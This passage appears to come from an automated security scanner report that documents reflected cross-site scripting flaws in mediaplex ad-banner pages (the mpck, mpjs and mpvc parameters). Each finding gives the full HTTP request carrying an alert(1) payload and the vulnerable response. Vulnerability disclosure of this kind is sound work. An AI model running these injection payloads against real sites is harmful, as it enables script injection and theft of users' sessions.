GET /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5Dbcf78"-alert(1)-"ce92a136ff1&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:18:57 GMT
Server: Apache
Last-Modified: Tue, 02 Aug 2011 19:36:20 GMT
ETag: "7e9e6e-129f-4a98adcb0d500"
Accept-Ranges: bytes
Content-Length: 5568
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]bcf78"-alert(1)-"ce92a136ff1" t
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5Dbcf78"-alert(1)-"ce92a136ff1");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5Dbcf78"-alert(1)-"ce92a136ff1
...[SNIP]...

5.48. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 489ce"><script>alert(1)</script>fc8c9872635 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D489ce"><script>alert(1)</script>fc8c9872635&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:18:57 GMT
Server: Apache
Last-Modified: Tue, 02 Aug 2011 19:36:20 GMT
ETag: "7e9e6e-129f-4a98adcb0d500"
Accept-Ranges: bytes
Content-Length: 5643
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]489ce"><script>alert(1)</script>fc8c9872635" target="_blank">
...[SNIP]...

5.49. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a4e1'%3balert(1)//fb1d5d0e816 was submitted in the mpck parameter. This input was echoed as 5a4e1';alert(1)//fb1d5d0e816 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D5a4e1'%3balert(1)//fb1d5d0e816&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:18:57 GMT
Server: Apache
Last-Modified: Tue, 02 Aug 2011 19:36:20 GMT
ETag: "7e9e6e-129f-4a98adcb0d500"
Accept-Ranges: bytes
Content-Length: 5574
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]5a4e1';alert(1)//fb1d5d0e816" t
...[SNIP]...
<a href="http://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]5a4e1';alert(1)//fb1d5d0e816" target="_blank">
...[SNIP]...

5.50. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpjs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html

Issue detail

The value of the mpjs request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d3e1"%3balert(1)//93fc47cfcae was submitted in the mpjs parameter. This input was echoed as 8d3e1";alert(1)//93fc47cfcae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D161611314842790928d3e1"%3balert(1)//93fc47cfcae&mpt=[555223779ER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:18:58 GMT
Server: Apache
Last-Modified: Tue, 02 Aug 2011 19:36:20 GMT
ETag: "7e9e6e-129f-4a98adcb0d500"
Accept-Ranges: bytes
Content-Length: 5456
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]" target="_blank"><img src="htt
...[SNIP]...
me=&adnet=&dvtagver=3.3.1346.2176&adsrv=8&plc=16161131484279092&advid=421303&sid=16161131484279092&adid= img-cdn.mediaplex.com/0/16161/Nielsen_pixel.js?campid=133016&crid=8029877&plid=161611314842790928d3e1";alert(1)//93fc47cfcae").split( " " );
for( var i = 0; i < mpjs.length; i++ ) {
document.write( "<" + "script type=\"text/javascript\" src=\"http://" + mpjs[i]+ "\">
...[SNIP]...

5.51. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97a01'%3balert(1)//a5343286805 was submitted in the mpvc parameter. This input was echoed as 97a01';alert(1)//a5343286805 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc=97a01'%3balert(1)//a5343286805 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:18:58 GMT
Server: Apache
Last-Modified: Tue, 02 Aug 2011 19:36:20 GMT
ETag: "7e9e6e-129f-4a98adcb0d500"
Accept-Ranges: bytes
Content-Length: 5570
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="97a01';alert(1)//a5343286805http://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]" t
...[SNIP]...
<a href="97a01';alert(1)//a5343286805http://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]" target="_blank">
...[SNIP]...

5.52. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb1ae"%3balert(1)//dabd418c3c5 was submitted in the mpvc parameter. This input was echoed as bb1ae";alert(1)//dabd418c3c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc=bb1ae"%3balert(1)//dabd418c3c5 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:18:58 GMT
Server: Apache
Last-Modified: Tue, 02 Aug 2011 19:36:20 GMT
ETag: "7e9e6e-129f-4a98adcb0d500"
Accept-Ranges: bytes
Content-Length: 5570
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="bb1ae";alert(1)//dabd418c3c5http://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]" t
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("bb1ae";alert(1)//dabd418c3c5");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("bb1ae";alert(1)//dabd418c3c5");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc = ("bb1ae"%3balert(1)//dabd4
...[SNIP]...

5.53. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7611"><script>alert(1)</script>912217c74dc was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc=d7611"><script>alert(1)</script>912217c74dc HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://movies.msn.com/movies/movie/i-don't-know-how-she-does-it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:18:58 GMT
Server: Apache
Last-Modified: Tue, 02 Aug 2011 19:36:20 GMT
ETag: "7e9e6e-129f-4a98adcb0d500"
Accept-Ranges: bytes
Content-Length: 5643
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="d7611"><script>alert(1)</script>912217c74dchttp://adfarm.mediaplex.com/ad/ck/16161-131484-27909-2?mpt=[555223779ER]" target="_blank">
...[SNIP]...

5.54. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 675f8"-alert(1)-"1ff134b311f was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D675f8"-alert(1)-"1ff134b311f&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: svid=319726075672; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:34 GMT
Server: Apache
Last-Modified: Thu, 28 Jul 2011 21:56:57 GMT
ETag: "91db10-12df-4a9283e5e5c40"
Accept-Ranges: bytes
Content-Length: 5627
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]675f8"-alert(1)-"1ff134b311f"
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D675f8"-alert(1)-"1ff134b311f");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D675f8"-alert(1)-"1ff134b311
...[SNIP]...

5.55. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dd24'%3balert(1)//8fded395788 was submitted in the mpck parameter. This input was echoed as 5dd24';alert(1)//8fded395788 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D5dd24'%3balert(1)//8fded395788&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: svid=319726075672; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:34 GMT
Server: Apache
Last-Modified: Thu, 28 Jul 2011 21:56:57 GMT
ETag: "91db10-12df-4a9283e5e5c40"
Accept-Ranges: bytes
Content-Length: 5633
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]5dd24';alert(1)//8fded395788"
...[SNIP]...
<a href="http://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]5dd24';alert(1)//8fded395788" target="_blank">
...[SNIP]...

5.56. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89cd3"><script>alert(1)</script>0d09c856d2f was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D89cd3"><script>alert(1)</script>0d09c856d2f&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: svid=319726075672; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:34 GMT
Server: Apache
Last-Modified: Thu, 28 Jul 2011 21:56:57 GMT
ETag: "91db10-12df-4a9283e5e5c40"
Accept-Ranges: bytes
Content-Length: 5702
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]89cd3"><script>alert(1)</script>0d09c856d2f" target="_blank">
...[SNIP]...
